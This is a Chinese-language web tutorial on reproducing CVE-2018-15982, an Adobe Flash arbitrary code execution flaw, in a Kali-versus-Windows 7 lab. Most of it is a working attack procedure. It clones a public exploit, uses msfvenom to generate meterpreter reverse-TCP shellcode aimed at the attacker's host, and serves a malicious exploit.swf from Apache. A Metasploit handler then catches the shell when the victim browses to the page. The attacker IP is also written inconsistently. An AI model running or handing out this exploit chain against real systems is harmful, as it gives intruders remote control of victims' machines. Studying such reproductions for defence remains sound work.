您好,登錄后才能下訂單哦!
這篇文章給大家介紹如何進(jìn)行任意代碼執(zhí)行漏洞CVE-2018-15982復(fù)現(xiàn),內(nèi)容非常詳細(xì),感興趣的小伙伴們可以參考借鑒,希望對(duì)大家能有所幫助。
2018年11月29日,某團(tuán)隊(duì)在全球范圍內(nèi)第一時(shí)間發(fā)現(xiàn)一起針對(duì)俄羅斯的APT攻擊行動(dòng),通過一份俄文內(nèi)容的醫(yī)院員工問卷文檔,攜帶最新的Flash 0day漏洞和具有自毀功能的專屬木馬程序,該漏洞(CVE-2018-15982)允許攻擊者惡意制作的Flash對(duì)象在受害者的計(jì)算機(jī)上執(zhí)行代碼,從而獲取對(duì)系統(tǒng)命令行的訪問權(quán)限。
AdobeFlash Player <= 31.0.0.153
AdobeFlash Player Installer<= 31.0.0.108
AdobeFlash Player 32.0.0.101
AdobeFlash Player Installer 31.0.0.122
攻擊機(jī):Linux kali (IP:190.168.23.130)
靶機(jī):Windows 7 X64 (IP:192.168.23.133)
git clone漏洞poc
git clone https://github.com/Ridter/CVE-2018-15982_EXP
創(chuàng)建payload程序
msfvenom -p windows/meterpreter/reverse_tcp_rc4RC4PASSWORD=ZALE LPORT=4444 LHOST=192.168.23.130 -f raw > 86.bin
msfvenom -p windows/meterpreter/reverse_tcp_rc4RC4PASSWORD=ZALE LPORT=4444 LHOST=192.168.23.130 -f raw > 64.bin
會(huì)生成兩個(gè)bin文件,分別為86bin和64bin
poc執(zhí)行并開啟http
生成poc
cp *.bin CVE-2018-15982_EXP/
cd CVE-2018-15982_EXP/
python CVE_2018_15982.py -i 86.bin -I 64.bin
開啟web服務(wù)
service apache2 start
cp index.html /var/www/html/
cp exploit.swf /var/www/html/
msf監(jiān)聽
msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp_rc4
set lport 4444
set lhost 192.168.23.130
set RC4PASSWORD zale
run
通過靶機(jī)訪問http://192.168.23.130/index.html
可以看到返回shell
關(guān)于如何進(jìn)行任意代碼執(zhí)行漏洞CVE-2018-15982復(fù)現(xiàn)就分享到這里了,希望以上內(nèi)容可以對(duì)大家有一定的幫助,可以學(xué)到更多知識(shí)。如果覺得文章不錯(cuò),可以把它分享出去讓更多的人看到。
免責(zé)聲明:本站發(fā)布的內(nèi)容(圖片、視頻和文字)以原創(chuàng)、轉(zhuǎn)載和分享為主,文章觀點(diǎn)不代表本網(wǎng)站立場,如果涉及侵權(quán)請(qǐng)聯(lián)系站長郵箱:is@yisu.com進(jìn)行舉報(bào),并提供相關(guān)證據(jù),一經(jīng)查實(shí),將立刻刪除涉嫌侵權(quán)內(nèi)容。